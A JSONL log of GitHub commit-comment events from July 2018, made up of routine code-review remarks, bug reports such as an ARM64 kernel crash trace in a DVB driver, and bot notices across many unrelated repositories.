{"id":"7919309596","type":"CommitCommentEvent","actor":{"login":"dmarion"},"repo":{"name":"DigitalDevices/dddvb"},"payload":{"comment":{"id":29597632,"position":null,"line":null,"path":null,"commit_id":"192a4ad20d62151cf5c1ed6a11b097686dbbd497","created_at":"2018-07-04T16:13:38Z","updated_at":"2018-07-04T16:13:38Z","author_association":"NONE","body":"This commit is introducing following crash on ARM64:\r\n```\r\n[  173.002448] kernel BUG at mm/vmalloc.c:1597!\r\n[  173.003998] Internal error: Oops - BUG: 0 [#1] PREEMPT SMP\r\n[  173.009638] Modules linked in: ddbridge(O) tda18271c2dd(O) tda18212dd(O) stv6111(O) stv6110x(O) stv0910(O) stv090x(O) stv0367dd(O) mxl5xx(O) lnbp21(O) lnbh25(O) drxk(O) cxd2843(O) cxd2099(O) dvb_core(O) zram zsmalloc mv88e6xxx dsa_core bridge stp llc sch_fq_codel ip_tables x_tables\r\n[  173.035359] CPU: 0 PID: 1227 Comm: tvh:lnxdvb-fron Tainted: G           O      4.17.3-mvebu64 #7\r\n[  173.044401] Hardware name: Globalscale Marvell ESPRESSOBin Board (DT)\r\n[  173.051033] pstate: 60000005 (nZCv daif -PAN -UAO)\r\n[  173.055975] pc : vfree+0x3c/0x90\r\n[  173.059308] lr : dvb_demux_release+0xa4/0x190 [dvb_core]\r\n[  173.064739] sp : ffffff800b2fbd80\r\n[  173.068144] x29: ffffff800b2fbd80 x28: ffffffc01819d100\r\n[  173.073609] x27: ffffff8008a51000 x26: 0000000000000039\r\n[  173.079075] x25: 0000000000000124 x24: ffffff800adb9528\r\n[  173.084540] x23: ffffff8009bed000 x22: ffffff800b1538b0\r\n[  173.090006] x21: ffffff800adb9508 x20: ffffff800adb9488\r\n[  173.095471] x19: ffffff800b153800 x18: 0000007fae034a70\r\n[  173.100937] x17: 0000007fae104ae8 x16: ffffff8008237920\r\n[  173.106402] x15: 0000000000000000 x14: 0000000000000023\r\n[  173.111869] x13: 03e4177703221271 x12: 03e5127003e60026\r\n[  173.117334] x11: 03e7001203e70011 x10: 03e7001003e70001\r\n[  173.122799] x9 : 0401ffffffffffff x8 : 0000000040000000\r\n[  173.128266] x7 : 0000000000210d00 x6 : 0000000000000000\r\n[  173.133731] x5 : ffffff8000afa1d0 x4 : ffffffc01819d100\r\n[  173.139196] x3 : 00000000ffffffff x2 : ffffffc01819d100\r\n[  173.144662] x1 : ffffffc01819d100 x0 : ffffff8009bed000\r\n[  173.150131] Process tvh:lnxdvb-fron (pid: 1227, stack limit = 0x0000000074286440)\r\n[  173.157834] Call trace:\r\n[  173.160351]  vfree+0x3c/0x90\r\n[  173.163324]  dvb_demux_release+0xa4/0x190 [dvb_core]\r\n[  173.168413]  __fput+0x88/0x1d0\r\n[  173.171546]  ____fput+0xc/0x18\r\n[  173.174684]  task_work_run+0x98/0xb8\r\n[  173.178359]  do_notify_resume+0xfc/0x108\r\n[  173.182387]  work_pending+0x8/0x10\r\n[  173.185883] Code: 97ffffad a8c27bfd d65f03c0 f9000bb3 (d4210000)\r\n[  173.192154] ---[ end trace 2d65f7c0855b2b59 ]---\r\n[  173.196903] Kernel panic - not syncing: Aiee, killing interrupt handler!\r\n[  173.203803] SMP: stopping secondary CPUs\r\n[  173.207834] Kernel Offset: disabled\r\n[  173.211416] CPU features: 0x2080200c\r\n[  173.215087] Memory Limit: none\r\n[  173.218230] ---[ end Kernel panic - not syncing: Aiee, killing interrupt handler! ]---\r\n```\r\n"}},"created_at":"2018-07-04T16:13:38Z"}
{"id":"7919310668","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29597635,"position":13,"line":31,"path":"code/Language/Drasil/Chunk/Eq.hs","commit_id":"b032040f259db486b4b1e988784879bb81cb9d00","created_at":"2018-07-04T16:13:55Z","updated_at":"2018-07-04T16:13:55Z","author_association":"OWNER","body":"My instinct was to say that `QDefinition` should not have notes. Somehow, I think that we might sometimes be abusing things and should be using data definitions instead. I think we need to migrate from our document-centric view of DD (and other like items) to a more semantics-centric view. And then build our document recipes accordingly."}},"created_at":"2018-07-04T16:13:55Z"}
{"id":"7919313521","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597644,"position":129,"line":230,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:14:38Z","updated_at":"2018-07-04T16:14:38Z","author_association":"OWNER","body":"If the user never have any amount of this currency, you will be comparing undefined < actualPricePaidm, which is risky. \r\nI would do first:\r\nvar playerCurrency0 = playerCombinedInfo.InfoResultPayload.UserVirtualCurrency[args.currency0] ? Number(playerCombinedInfo.InfoResultPayload.UserVirtualCurrency[args.currency0]) : 0;\r\n\r\nAlso, currency0 is a name I don't like for a variable (same as price0). "}},"created_at":"2018-07-04T16:14:38Z"}
{"id":"7919314697","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"mvidalgarcia/indico"},"payload":{"comment":{"id":29597649,"position":15,"line":91,"path":"indico/modules/rb_new/controllers/backend.py","commit_id":"11394e977a5bf36db9ae282d6e8c705b1c5f5eca","created_at":"2018-07-04T16:14:57Z","updated_at":"2018-07-04T16:14:57Z","author_association":"NONE","body":"roombooking does not use UTC but localtime"}},"created_at":"2018-07-04T16:14:57Z"}
{"id":"7919315273","type":"CommitCommentEvent","actor":{"login":"slavazhukov2"},"repo":{"name":"slavazhukov2/webdev-4072018"},"payload":{"comment":{"id":29597651,"position":null,"line":null,"path":null,"commit_id":"92e280cd6bde08581d49deb180a122bf92e141d0","created_at":"2018-07-04T16:15:07Z","updated_at":"2018-07-04T16:15:07Z","author_association":"OWNER","body":"Молодец"}},"created_at":"2018-07-04T16:15:07Z"}
{"id":"7919315319","type":"CommitCommentEvent","actor":{"login":"sebastianst"},"repo":{"name":"sebastianst/ABY"},"payload":{"comment":{"id":29597652,"position":7,"line":154,"path":"src/abycore/circuit/circuit.cpp","commit_id":"67284fc19ee993761a60ba64d3ac3ea47e698150","created_at":"2018-07-04T16:15:08Z","updated_at":"2018-07-04T16:15:08Z","author_association":"OWNER","body":"a07ad147c9a9d6043b62c7fb3b65046f79a79039"}},"created_at":"2018-07-04T16:15:08Z"}
{"id":"7919316026","type":"CommitCommentEvent","actor":{"login":"sergiosha"},"repo":{"name":"sergiosha/agenda"},"payload":{"comment":{"id":29597654,"position":null,"line":null,"path":null,"commit_id":"743a7eab506da497adb1d6d98570079257b01583","created_at":"2018-07-04T16:15:17Z","updated_at":"2018-07-04T16:15:17Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-04T16:15:17Z"}
{"id":"7919321006","type":"CommitCommentEvent","actor":{"login":"eduperez"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29597669,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-04T16:16:34Z","updated_at":"2018-07-04T16:16:34Z","author_association":"NONE","body":"@p3x-robot Please notice that my experience is exactly the opposite to yours..."}},"created_at":"2018-07-04T16:16:34Z"}
{"id":"7919321603","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29597670,"position":null,"line":null,"path":null,"commit_id":"cb6380502a6bbb7475ab55617786282e09f1edfc","created_at":"2018-07-04T16:16:43Z","updated_at":"2018-07-04T16:16:43Z","author_association":"OWNER","body":"commit cb63805"}},"created_at":"2018-07-04T16:16:43Z"}
{"id":"7919322445","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597672,"position":138,"line":239,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:16:57Z","updated_at":"2018-07-04T16:16:57Z","author_association":"OWNER","body":"It could also be that the price is not defined for that currency. So you could check that too:\r\nitem.VirtualCurrencyPrices[args.currency0] != null && item.VirtualCurrencyPrices[args.currency0] != actualPricePaid\r\n"}},"created_at":"2018-07-04T16:16:57Z"}
{"id":"7919323051","type":"CommitCommentEvent","actor":{"login":"slavazhukov2"},"repo":{"name":"slavazhukov2/webdev-4072018"},"payload":{"comment":{"id":29597675,"position":3,"line":3,"path":"index.php","commit_id":"34302ac2874934926afef09524ae2c9b35ffa097","created_at":"2018-07-04T16:17:08Z","updated_at":"2018-07-04T16:17:08Z","author_association":"OWNER","body":"Кто так делает?"}},"created_at":"2018-07-04T16:17:08Z"}
{"id":"7919328742","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29597683,"position":null,"line":null,"path":null,"commit_id":"43dfd608fcb1d1f3e33a377168073e21b15a6f14","created_at":"2018-07-04T16:18:46Z","updated_at":"2018-07-04T16:18:46Z","author_association":"COLLABORATOR","body":"No, I was suggesting adding a new method (i.e. function) to the existing database.php class. So you'd have two functions in it, both of which do database interaction -related things (so should therefore be in the same class)."}},"created_at":"2018-07-04T16:18:46Z"}
{"id":"7919329757","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"vulkano-rs/vulkano"},"payload":{"comment":{"id":29597686,"position":null,"line":null,"path":null,"commit_id":"f3aa3b600cf8a027c6c733f4c4a1d47bde629c5a","created_at":"2018-07-04T16:19:03Z","updated_at":"2018-07-04T16:19:03Z","author_association":"NONE","body":"f3aa3b6"}},"created_at":"2018-07-04T16:19:03Z"}
{"id":"7919330681","type":"CommitCommentEvent","actor":{"login":"sisou"},"repo":{"name":"nimiq/keyguard-next"},"payload":{"comment":{"id":29597690,"position":14,"line":14,"path":"demos/PinInput.html","commit_id":"e7cacb0612299e8f8c1603ee9717edc87b235bc5","created_at":"2018-07-04T16:19:18Z","updated_at":"2018-07-04T16:19:18Z","author_association":"CONTRIBUTOR","body":"I believe you don't need the assignment to `window` here, because this is not a module script."}},"created_at":"2018-07-04T16:19:18Z"}
{"id":"7919331137","type":"CommitCommentEvent","actor":{"login":"peak3d"},"repo":{"name":"Sandmann79/xbmc"},"payload":{"comment":{"id":29597691,"position":13,"line":46,"path":"plugin.video.amazon/resources/lib/common.py","commit_id":"1386ecf9bf8d515114dce7947b327865bc052482","created_at":"2018-07-04T16:19:25Z","updated_at":"2018-07-04T16:19:25Z","author_association":"NONE","body":"yes, this is correct - but necessary to reflect changes in settings which may have done between two calls.\r\nThis is also the reason why we need the get_addon() function instead using \"addon\".\r\n\r\nSure, from design this is not optimal for the first call (because we instanciate addon 2 times)\r\n\r\nOption 2 is putting the initialization block above init_commons() into the function init_commons.\r\nGoing this way you have to assure, that the first import if common.py takes place in default / service.py, otherwise the globals are not created.\r\n\r\nOption 3: Put all these common things into a class, create a get_common() getter which returns all actual values.\r\nDealing with the globals for ychanging data between py files is really messy."}},"created_at":"2018-07-04T16:19:25Z"}
{"id":"7919332306","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29597692,"position":null,"line":null,"path":null,"commit_id":"448e2fe1a2126a690cf0ddd442cb8dc16a2167f5","created_at":"2018-07-04T16:19:44Z","updated_at":"2018-07-04T16:19:44Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/download-cache-bug-strikes-back/91228/4\n"}},"created_at":"2018-07-04T16:19:44Z"}
{"id":"7919332476","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597693,"position":159,"line":260,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:19:47Z","updated_at":"2018-07-04T16:19:47Z","author_association":"OWNER","body":"We need to be careful with this. If the second subtraction fails, we already removed some virtual currency in the call before. We need to ask Brendan how to handle transactions in PlayFab."}},"created_at":"2018-07-04T16:19:47Z"}
{"id":"7919334548","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29597697,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-04T16:20:20Z","updated_at":"2018-07-04T16:20:20Z","author_association":"CONTRIBUTOR","body":"> In der aktuellen Implementierung bin ich mir recht sicher, dass es zu keiner Endlosschleife kommt. 100% würde ich da jetzt nicht drauf setzten, aber 99,999% schon.\r\n\r\nDies ist mir zuwenig, ich hätte gerne 100% Sicherheit, daß es zu keiner Endlosschleife kommen kann, da die Auswirkungen einer Endlosschleife sehr heftig sind.\r\nFHEM ist nicht mehr bedienbar und kann nur noch mit kill oder reboot beendet werden, und das Dateisystem vom log-Verzeichnis läuft recht schnell voll. \r\n\r\nIch habe keine Bedenken hinsichtlich der korrekten Funktion meines Codes.\r\nFür das ca 0,001% Restrisiko habe ich das repeat <20 eingebaut."}},"created_at":"2018-07-04T16:20:20Z"}
{"id":"7919334769","type":"CommitCommentEvent","actor":{"login":"kcopper8"},"repo":{"name":"kcopper8/english-study"},"payload":{"comment":{"id":29597698,"position":37,"line":37,"path":"A New Refined CollectionView for Marionette.js/text.md","commit_id":"27d4d89bbdad5f605adba6d5293356d5dfec1cca","created_at":"2018-07-04T16:20:23Z","updated_at":"2018-07-04T16:20:23Z","author_association":"OWNER","body":"> a lot of new code that needs to be battle tested in the real world\r\n\r\n라는 표현이 의미하는 바를 이해하기 어렵습니다. 문맥으로 추측해 적었는데 제대로 번역했다는 느낌이 들지 않네요. :)\r\n\r\n`battle` 은 명사로 사용되었을 테니, `code that needs to be battle` 은 \"`battle` 이 될 필요가 있는 `code`\" 라고 읽었습니다. `code` 가 전투나 투쟁이 된다는 말은 의역해서 그 코드를 적용하는 일이 투쟁(`battle`)이라고 부를 만큼 힘들 것이다는 의미로 이해했습니다.\r\n\r\n그리고 `battle tested in the real world` 도 의미가 이해가 잘 가지 않았습니다. \"시험되는 투쟁\" 이라는 표현이 추상적인 개념으로 구성되어 있어서, 어떤 의미인지 속시원하게 이해했다는 느낌이 없습니다. \r\n\r\n혹시 여기서 사용된 `battle` 이 사전적 의미의 싸움이나 투쟁이 아닌 숙어의 일부가 아닐까 하는 생각도 들었는데요, 사전이나 urbandictionary 에서 크게 다른 의미를 찾지는 못했습니다. :)"}},"created_at":"2018-07-04T16:20:23Z"}
{"id":"7919335517","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29597699,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-04T16:20:35Z","updated_at":"2018-07-04T16:20:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T16:20:35Z"}
{"id":"7919336699","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"newpavlov/vulkano"},"payload":{"comment":{"id":29597701,"position":null,"line":null,"path":null,"commit_id":"f3aa3b600cf8a027c6c733f4c4a1d47bde629c5a","created_at":"2018-07-04T16:20:54Z","updated_at":"2018-07-04T16:20:54Z","author_association":"NONE","body":"f3aa3b6"}},"created_at":"2018-07-04T16:20:54Z"}
{"id":"7919338591","type":"CommitCommentEvent","actor":{"login":"wogoos"},"repo":{"name":"ArduinoHannover/NTP"},"payload":{"comment":{"id":29597703,"position":null,"line":null,"path":null,"commit_id":"8210d3e489b1418f8507e9cb499c94d723cc845a","created_at":"2018-07-04T16:21:26Z","updated_at":"2018-07-04T16:21:26Z","author_association":"NONE","body":"Hi Soundstorm, \r\nI'm using your ESPmailer which uses your NTP functions. Thanks for those routines, to me they work nice. I'm not a super programmer as you are and am trying to find out how to use your NTP function at setup() and Loop() level. I have tried to call the function you use in the ESPmailer class but no success. Can you tell me the best way I can access the NTP function from a Setup() and Loop() level. Thanks Oscar Goos "}},"created_at":"2018-07-04T16:21:26Z"}
{"id":"7919339623","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597705,"position":169,"line":270,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:21:42Z","updated_at":"2018-07-04T16:21:42Z","author_association":"OWNER","body":"I would pass item_id as an array, and change the function utils__grantItemsToUser  to expect and array"}},"created_at":"2018-07-04T16:21:42Z"}
{"id":"7919340239","type":"CommitCommentEvent","actor":{"login":"Allen-B1"},"repo":{"name":"Allen-B1/news"},"payload":{"comment":{"id":29597707,"position":null,"line":null,"path":null,"commit_id":"d4d6125c6ff6206cd95786a7a8cb0681f3bbe09a","created_at":"2018-07-04T16:21:53Z","updated_at":"2018-07-04T16:21:53Z","author_association":"OWNER","body":"and #66"}},"created_at":"2018-07-04T16:21:53Z"}
{"id":"7919340523","type":"CommitCommentEvent","actor":{"login":"wogoos"},"repo":{"name":"ArduinoHannover/NTP"},"payload":{"comment":{"id":29597708,"position":null,"line":null,"path":null,"commit_id":"8210d3e489b1418f8507e9cb499c94d723cc845a","created_at":"2018-07-04T16:21:58Z","updated_at":"2018-07-04T16:21:58Z","author_association":"NONE","body":"by the way you can email me at wogoos at gmx.com"}},"created_at":"2018-07-04T16:21:58Z"}
{"id":"7919341327","type":"CommitCommentEvent","actor":{"login":"micah"},"repo":{"name":"riseupnet/riseup_help"},"payload":{"comment":{"id":29597710,"position":4,"line":6,"path":"pages/about-us/press/en.text","commit_id":"50e0d80a20392ae9de97da2813aff4a0b153299d","created_at":"2018-07-04T16:22:12Z","updated_at":"2018-07-04T16:22:12Z","author_association":"CONTRIBUTOR","body":"Justin Lavoie <notifications@github.com> writes:\n\n> @micah we're in 2018 ! ;)\n\nmaybe you are! I'm still living in the past ;)\n\nI'm pushing out a fix, thanks !\n"}},"created_at":"2018-07-04T16:22:12Z"}
{"id":"7919347266","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"usegalaxy-eu/website"},"payload":{"comment":{"id":29597716,"position":8,"line":8,"path":"_posts/2018-07-03-tool-usage-graphs.md","commit_id":"02fb0f6f1acd0c9567c3cb0da0e006e3e7c3fdf9","created_at":"2018-07-04T16:23:43Z","updated_at":"2018-07-04T16:23:43Z","author_association":"CONTRIBUTOR","body":"Not sure what the second link should link to, but it is not working :("}},"created_at":"2018-07-04T16:23:43Z"}
{"id":"7919348629","type":"CommitCommentEvent","actor":{"login":"Saga305"},"repo":{"name":"Saga305/Python"},"payload":{"comment":{"id":29597720,"position":null,"line":null,"path":null,"commit_id":"00db4ea5299c5c11603b3d6e4b8bdd8ccbbfe2b0","created_at":"2018-07-04T16:24:07Z","updated_at":"2018-07-04T16:24:07Z","author_association":"OWNER","body":"Getting errors:\r\n\r\ndhvanish@dhvanish-Inspiron-5520:~/Practice/Python/sock$ python3 ser.py \r\nGot connection from ('127.0.0.1', 55081)\r\nTraceback (most recent call last):\r\n  File \"ser.py\", line 16, in <module>\r\n    Main()\r\n  File \"ser.py\", line 9, in Main\r\n    print(\"Girl:\",s.receive())\r\n  File \"/home/dhvanish/Practice/Python/sock/tcpsocket.py\", line 32, in receive\r\n    return self.sk.recv(1024).decode()\r\nOSError: [Errno 107] Transport endpoint is not connected\r\n![screenshot from 2018-07-04 21 53 06](https://user-images.githubusercontent.com/10482359/42287624-c0aff97a-7fd4-11e8-9184-10b57242c087.png)\r\n"}},"created_at":"2018-07-04T16:24:07Z"}
{"id":"7919366921","type":"CommitCommentEvent","actor":{"login":"erasche"},"repo":{"name":"usegalaxy-eu/website"},"payload":{"comment":{"id":29597757,"position":8,"line":8,"path":"_posts/2018-07-03-tool-usage-graphs.md","commit_id":"02fb0f6f1acd0c9567c3cb0da0e006e3e7c3fdf9","created_at":"2018-07-04T16:29:14Z","updated_at":"2018-07-04T16:29:14Z","author_association":"MEMBER","body":"fixed"}},"created_at":"2018-07-04T16:29:14Z"}
{"id":"7919372769","type":"CommitCommentEvent","actor":{"login":"kalomgir882"},"repo":{"name":"kalomgir882/bcvnfgj"},"payload":{"comment":{"id":29597766,"position":null,"line":null,"path":null,"commit_id":"a33b3a07405137c8227ed4ec6732d58ef75e7610","created_at":"2018-07-04T16:30:52Z","updated_at":"2018-07-04T16:30:52Z","author_association":"OWNER","body":"\r\nauthor: Alamofire Software Foundation\r\nauthor_url: http://alamofire.org/\r\ngithub_url: https://github.com/Alamofire/Alamofire\r\nroot_url: https://alamofire.github.io/Alamofire/\r\nmodule: Alamofire\r\noutput: docs\r\ntheme: fullwidth\r\nxcodebuild_arguments: [-workspace, 'Alamofire.xcworkspace', -scheme, 'Alamofire iOS']"}},"created_at":"2018-07-04T16:30:52Z"}
{"id":"7919381381","type":"CommitCommentEvent","actor":{"login":"vartemiev"},"repo":{"name":"htmlacademy-javascript/13939-kekstagram"},"payload":{"comment":{"id":29597774,"position":5,"line":57,"path":"js/preview.js","commit_id":"dc9ccd9cb1078917aa6af7a161774ca28852d391","created_at":"2018-07-04T16:33:24Z","updated_at":"2018-07-04T16:33:24Z","author_association":"COLLABORATOR","body":"А почему обязательно в window запихивать? Она же не экспортируется из модуля?"}},"created_at":"2018-07-04T16:33:24Z"}
{"id":"7919381460","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29597775,"position":null,"line":null,"path":null,"commit_id":"d84ef967424343abcc48b8f945d5e7807f1c1e09","created_at":"2018-07-04T16:33:25Z","updated_at":"2018-07-04T16:33:25Z","author_association":"MEMBER","body":"@dstogov The original intention behind forbidding string keys was to ensure forward compatibility with named parameters (in which case we might want to unpack the value into the parameter with the corresponding name). In that respect the problematic cases are strings and maybe objects (as they can have __toString).\r\n\r\nI think your change makes sense, but I don't care strongly either way."}},"created_at":"2018-07-04T16:33:25Z"}
{"id":"7919383684","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597779,"position":185,"line":286,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:34:03Z","updated_at":"2018-07-04T16:34:03Z","author_association":"OWNER","body":"I think I would create 2 different handlers \"buy_refill_lives\" and \"ads_refill_lives\" since the logic is quite different and probably we want to do different checks"}},"created_at":"2018-07-04T16:34:03Z"}
{"id":"7919383805","type":"CommitCommentEvent","actor":{"login":"Varstahl"},"repo":{"name":"Sandmann79/xbmc"},"payload":{"comment":{"id":29597780,"position":13,"line":46,"path":"plugin.video.amazon/resources/lib/common.py","commit_id":"1386ecf9bf8d515114dce7947b327865bc052482","created_at":"2018-07-04T16:34:05Z","updated_at":"2018-07-04T16:34:05Z","author_association":"COLLABORATOR","body":"Yeah, ok, that's all I wanted to know. I'm currently working on a class based solution for the other Amazon addon, and your work gave (at least to me) a base idea on how to transition properly. I just noticed the double instantiation while statically glancing at the changes.\r\n\r\nIt's just something to keep in mind while improving and going forward, that's all."}},"created_at":"2018-07-04T16:34:05Z"}
{"id":"7919387001","type":"CommitCommentEvent","actor":{"login":"BusinessAlpaca"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29597789,"position":null,"line":null,"path":null,"commit_id":"72034c6f39b2c965eb99abd09ace1fefa5d90980","created_at":"2018-07-04T16:35:01Z","updated_at":"2018-07-04T16:35:01Z","author_association":"OWNER","body":"@QuickUnit "}},"created_at":"2018-07-04T16:35:01Z"}
{"id":"7919387795","type":"CommitCommentEvent","actor":{"login":"natecrow"},"repo":{"name":"natecrow/my-destinations"},"payload":{"comment":{"id":29597793,"position":null,"line":null,"path":null,"commit_id":"6fe5efadeececbe0bdc98ed133eefc3c4868cd3f","created_at":"2018-07-04T16:35:15Z","updated_at":"2018-07-04T16:35:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [View all destination lists](https://trello.com/c/Dy6uGweT/7-view-all-destination-lists)"}},"created_at":"2018-07-04T16:35:15Z"}
{"id":"7919388632","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29597799,"position":1,"line":null,"path":"1530722127.8/github_test.txt","commit_id":"29503f3695f25ec77b6fef85309c10bed2f5cff4","created_at":"2018-07-04T16:35:30Z","updated_at":"2018-07-04T16:35:30Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-04T16:35:30Z"}
{"id":"7919389178","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"m-bosman/phpmyadmin"},"payload":{"comment":{"id":29597805,"position":null,"line":null,"path":null,"commit_id":"ba431205247c5e7ddbd1502c60d2c92a03f18332","created_at":"2018-07-04T16:35:38Z","updated_at":"2018-07-04T16:35:38Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-04T16:35:38Z"}
{"id":"7919391364","type":"CommitCommentEvent","actor":{"login":"docholiday"},"repo":{"name":"phppgadmin/phppgadmin"},"payload":{"comment":{"id":29597809,"position":null,"line":null,"path":null,"commit_id":"508c806b336ab66d818c252396ccb3612a9f423b","created_at":"2018-07-04T16:36:16Z","updated_at":"2018-07-04T16:36:16Z","author_association":"NONE","body":"Hi there, thank you for your work! Just out of curiosity - why did you replace the one-liner with the XHTML_Option in many files? As far as I understand, it just makes the script slower and needs more RAM for the additional variables. Please correct me, if I'm wrong..."}},"created_at":"2018-07-04T16:36:16Z"}
{"id":"7919392126","type":"CommitCommentEvent","actor":{"login":"ab14bhardwaj"},"repo":{"name":"AppLozic/Applozic-Web-Plugin"},"payload":{"comment":{"id":29597811,"position":63,"line":4510,"path":"public/plugin/js/app/fullview/applozic.fullview.js","commit_id":"cde98f0c386af2dea4d1b4c45002f07d1a972ca3","created_at":"2018-07-04T16:36:29Z","updated_at":"2018-07-04T16:36:29Z","author_association":"COLLABORATOR","body":"No, as previously blank was used which opens the linked document in a new window or tab whereas in case of self it opens the linked document in the same in the same tab.\r\n--\r\n\r\n\r\n"}},"created_at":"2018-07-04T16:36:29Z"}
{"id":"7919392481","type":"CommitCommentEvent","actor":{"login":"hhyyrylainen"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29597812,"position":17,"line":52,"path":"scripts/microbe_stage/microbe_ai.as","commit_id":"5a4b2bd74d573cdb51606e11d9e91c663ab6e197","created_at":"2018-07-04T16:36:36Z","updated_at":"2018-07-04T16:36:36Z","author_association":"CONTRIBUTOR","body":"The reason i've kept these storage things around is for potential future reference if we need them for saving / loading. But I agree that these will be probably completely useless as the AI will change a lot."}},"created_at":"2018-07-04T16:36:36Z"}
{"id":"7919392752","type":"CommitCommentEvent","actor":{"login":"ryenus"},"repo":{"name":"Microsoft/vscode-docs"},"payload":{"comment":{"id":29597813,"position":5,"line":191,"path":"release-notes/v1_25.md","commit_id":"1400219c946620a9e2c36faa4788574fd8f5b6b5","created_at":"2018-07-04T16:36:42Z","updated_at":"2018-07-04T16:36:42Z","author_association":"NONE","body":"@ramya-rao-a, regarding the notes about customizable extensions view, \r\nwhat about including the context menu in the screenshot, like the one below?\r\n\r\n<img src='https://user-images.githubusercontent.com/610161/42287953-43c67abc-7feb-11e8-8631-b536a8f75ae5.png' width='300px'/>\r\n"}},"created_at":"2018-07-04T16:36:42Z"}
{"id":"7919393879","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597814,"position":211,"line":312,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:37:04Z","updated_at":"2018-07-04T16:37:04Z","author_association":"OWNER","body":"You need to check if the player has enough diamonds and the subtract them (in case he pays with diamonds). Also, for the future, we will want to check that he really watched the ad (there are ways to check that from the backend), and also to check when was the last ad he watched and set a cooldown (talk to GD about that)"}},"created_at":"2018-07-04T16:37:04Z"}
{"id":"7919394045","type":"CommitCommentEvent","actor":{"login":"jum-s"},"repo":{"name":"AtelierSoude/OpenRepairPlatform"},"payload":{"comment":{"id":29597815,"position":null,"line":null,"path":null,"commit_id":"0a30fe4b8cf657c36e38812efc0738faa244817a","created_at":"2018-07-04T16:37:07Z","updated_at":"2018-07-04T16:37:07Z","author_association":"COLLABORATOR","body":"tape $`docker-compose -f deployment/docker-compose.yml run --rm django python ateliersoude/manage.py show_urls` \r\net t'as un beau tableau qui décrit toutes les urls de l'app (avec quelques doublons etc."}},"created_at":"2018-07-04T16:37:07Z"}
